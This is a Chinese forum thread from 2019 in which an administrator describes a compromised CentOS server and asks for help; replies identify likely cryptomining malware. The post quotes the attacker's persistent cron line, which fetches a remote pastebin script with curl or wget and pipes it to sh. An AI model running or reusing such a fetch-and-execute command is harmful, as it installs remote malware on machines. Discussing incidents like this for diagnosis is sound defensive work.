V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
abcbuzhiming
V2EX  ›  Linux

Linux 被入侵了该怎么整,入侵者摆明了不怕你知道

  •  1
     
  •   abcbuzhiming · 2019-02-21 23:26:20 +08:00 · 18532 次点击
    这是一个创建于 2105 天前的主题,其中的信息可能已经有所发展或是发生改变。
    今天一觉起来,被报告说有台 CentOS7.5 速度变的很卡。上去一看,没发现 CPU,内存占用有什么很异常的地方,随手敲 netstat -ntlp 准备看看端口占用是不是由异常,结果出现提示:-bash: /usr/bin/netstat: No such file or directory。啊?什么鬼。再一检查 /usr/bin/netstat 文件不存在,我还以为是被不小心删掉了,不管,yum reinstall net-tools 重装网络套件,结果这一装就露出马脚了,/usr/bin/netstat 文件在刚装好的时候是可以用的,几分钟之内,就不翼而飞了,反复几次后,我就明白有什么程序把它给自动删掉了。随后进一步检查发现,
    crontab -l 查定时任务发现这样一行代码:绝对不是我设置的
    */15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
    打开这个网址发现得到的是一串明显被加密过的字符串,无法进一步排查。删除这个信息,几分钟内会被重新添加。

    现在,用 netstat -ntlp 查不出有异常端口,但是我个人怀疑 netstat 很可能已被某种手段屏蔽,证据就是它看不到占用 80 端口的 Nginx (我确定 Nginx 仍然在工作)的 PID(显示为 - ),lsof -i:80 同样失效,我猜测黑客(木马)是打算使用 80 端口的,但是 80 端口跑着 Nginx 导致没成功。机器上的 /usr/bin/netstat 每隔几分钟就被删除,计划任务里始终有那条自动执行请求,我删掉等一会就会自动添加。ps -ef 查不出有异常进程,CPU 和内存均无特别异常,就是系统响应速度慢。我该咋办,除了备份数据重装系统没办法了吗?头一次这么嚣张的 Linux 入侵
    106 条回复    2019-02-23 18:53:29 +08:00
    1  2  
    shm7
        101
    shm7  
       2019-02-22 19:20:20 +08:00 via iPhone
    100%不被黑的方法,很简单,关机。“你埋在地里越深越安全”——非知名 985 学校自以为比较 dior 的年轻副教授。
    40huo
        102
    40huo  
       2019-02-22 19:30:31 +08:00 via Android
    看着像是 ddg,ddg 出了清除工具,github 上有
    reticentfat
        103
    reticentfat  
       2019-02-22 20:43:09 +08:00
    基本都是挖矿软件了
    ProjectSky
        104
    ProjectSky  
       2019-02-22 20:57:08 +08:00
    脚本最后几句的注释很有意思。
    #1.If you crack my program, please don't reveal too much code online.Many hacker boys have copied my kworkerds code,more systems are being attacked.(Especially libioset)
    #2.I used to want a secure network,social change of humanity,but I really don't like being bad hacker.
    #3.All data is safe,only mining
    konakona
        105
    konakona  
       2019-02-23 18:00:28 +08:00
    所以说你们要用 VPC 网络安全设置,这样可以限定哪些端口可以访问,比如 redis 弱口令问题就解决了……
    1  2  
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3414 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 00:17 · PVG 08:17 · LAX 16:17 · JFK 19:17
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.